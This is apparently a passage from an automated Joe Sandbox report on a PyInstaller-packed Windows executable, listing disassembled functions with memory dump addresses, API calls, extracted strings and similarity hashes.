                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                              • Opcode ID: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
                                                                                                                                                                                                                              • Instruction ID: dd8c85cd44562e659655ac29c99e1bc5d5451cfb855f5b8be24bd74d21e16da3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8215E31E0D64242FB20AB75F49422AF7A1FB857A0F90427DEAAD43AE8DF6CD4448710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 64d992c46ee3b7395fe78fb810fe312dfe396e54660f00f57cdb80144ae96788
                                                                                                                                                                                                                              • Instruction ID: 40b21d87861405551dd29c9adcbdeb250ea76e23b17a8eca0879de3400dcda30
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64d992c46ee3b7395fe78fb810fe312dfe396e54660f00f57cdb80144ae96788
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20210C20E0F34642FA787B71AA5917DF2929F447A0F9486BCED3E466D6DE2CB8414320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getservbyporthtons
                                                                                                                                                                                                                              • String ID: getservbyport: port must be 0-65535.$i|s:getservbyport$port/proto not found$socket.getservbyport
                                                                                                                                                                                                                              • API String ID: 3477891686-2618607128
                                                                                                                                                                                                                              • Opcode ID: 958b96406755ee6dfe24f7a4625e947aabcd92a470a3e42bae2d05d6fec3ec86
                                                                                                                                                                                                                              • Instruction ID: 1b6dc510a6631848e466a5f358a6e67ed3824f71c9bbea58815cbc16d250a2ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 958b96406755ee6dfe24f7a4625e947aabcd92a470a3e42bae2d05d6fec3ec86
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8121E631A18A03A1EA309B16E85467D6371FBC9BA5F580033DA4E47E78EF7DE048C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                              • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                              • Instruction ID: a82c8a6454abc9f9a96854bade8cba12e1fb63ec7c658794435a6b7df54cae6c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C118721B1DA4586F360AB62F854329B3A0FB48FE4F90427CEA5D877A4DF7CD8048750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
                                                                                                                                                                                                                              • API String ID: 3568877910-1635961163
                                                                                                                                                                                                                              • Opcode ID: aa3d85a4cbc314c83165fc7c7836ff9eeeabadabe142487fe9ec6a464303ce07
                                                                                                                                                                                                                              • Instruction ID: 20da9a1bb402cca6db5582f98c742776a281beedebf3143851204a1b0430687a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa3d85a4cbc314c83165fc7c7836ff9eeeabadabe142487fe9ec6a464303ce07
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9027D72B5DA8281EB109B19E4402BD77A1EB84BC4F188137DB8D47BA5DF3DE592CB01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF79A319216), ref: 00007FF79A318592
                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A3185E9
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A319400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF79A3145E4,00000000,00007FF79A311985), ref: 00007FF79A319439
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A318678
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A3186E4
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A3186F5
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A31870A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                              • Opcode ID: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
                                                                                                                                                                                                                              • Instruction ID: dba5e01fc88a54f0df9eb652ebd4e3ee7c3ac9c6ab4bfd903598468ac0cea3c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B418162B1A68241FA70EB32A5446AAB394FB84BC4F85027DDF8D57B89DE3CD501C724
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: GetCurrentProcess.KERNEL32 ref: 00007FF79A318780
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: OpenProcessToken.ADVAPI32 ref: 00007FF79A318793
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: GetTokenInformation.ADVAPI32 ref: 00007FF79A3187B8
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: GetLastError.KERNEL32 ref: 00007FF79A3187C2
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: GetTokenInformation.ADVAPI32 ref: 00007FF79A318802
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF79A31881E
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: CloseHandle.KERNEL32 ref: 00007FF79A318836
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF79A313C55), ref: 00007FF79A31916C
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF79A313C55), ref: 00007FF79A319175
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                              • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                              • Instruction ID: 20e327d6d17f214a5e18aba345cb5dd2f49317a5bb8afa184f016e94d62aa5ab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E214B21A0E74282F660FB31E9152EAB3A4EF88780FC444BDEA4D53796DF3CD8458760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Socketclosesocket$CurrentDuplicateHandleInformationProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 174288908-0
                                                                                                                                                                                                                              • Opcode ID: d16baa06ec3d4bbc466152658493e9ad99c42351d06faec33e887c6431ca5712
                                                                                                                                                                                                                              • Instruction ID: c1112fa1fcd7df17206255556606ebe2509e48fb4fa4baa33b7d71bb3f21b4a4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d16baa06ec3d4bbc466152658493e9ad99c42351d06faec33e887c6431ca5712
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A213224A1D74291EA749B31A81877D62A1BFC8BB4F080636D92E47BF4FF7CE0048600
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B347
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B37D
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3AA
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3BB
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3CC
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3E7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 508bc4e8de0e80a19cd6daf9ed8871fa40715e6eab000f8b832e18dd1cfec2a0
                                                                                                                                                                                                                              • Instruction ID: 38e3362a4eacfb75e83ecbf16b4a28812e42bfc1184b3967348f694af00986e0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 508bc4e8de0e80a19cd6daf9ed8871fa40715e6eab000f8b832e18dd1cfec2a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE113B20B0E64282FA74BB319A5517DF2829F447A0FD487BCEE2E467D6DE2CB4018321
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF79A311B6A), ref: 00007FF79A31295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                              • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                              • Instruction ID: f501e8dbccc9f18aa5ac0fcba33b4eebf876968e719e9e4b1fa66b54cfee513b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6531B522B1A68152F730EB75A8416E6B295BF887D8F80013DFE8D83755EF7CD5468610
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                              • Opcode ID: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
                                                                                                                                                                                                                              • Instruction ID: ea6164a33f99ea05d5061345a38fa5467f57571141975a36f91b6de440f74145
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28314A72A1AA8289FB20EF71E8552F9B360FF89788F84017DEA4D47A49DF3CD1458710
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: et:gethostbyaddr$idna$socket.gethostbyaddr$unsupported address family
                                                                                                                                                                                                                              • API String ID: 0-1751716127
                                                                                                                                                                                                                              • Opcode ID: e4f5240f7e4e449b1ad7fc171f0c48406e2e69f94d75fa22bb95770df805e3d6
                                                                                                                                                                                                                              • Instruction ID: 1387a1cba94596b66ca95d3cfeca65820b0d6c34c8b591b979dbd5851756640a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4f5240f7e4e449b1ad7fc171f0c48406e2e69f94d75fa22bb95770df805e3d6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72311E61B08686A1EA709B16E8547AE6360FBD8BA4F480033DE8D47F74EE7CE449C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF79A31918F,?,00007FF79A313C55), ref: 00007FF79A312BA0
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF79A312C2A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                              • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                              • Instruction ID: 2f389f5a7695937ff2bc29169c8e6a2f334d5f5fcfb6527f915c45107f6b20f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F021D122B09B4192F720EB65F8847EAB3A4FB88784F80013EEE8D57659DE3CD645C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF79A311B99), ref: 00007FF79A312760
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
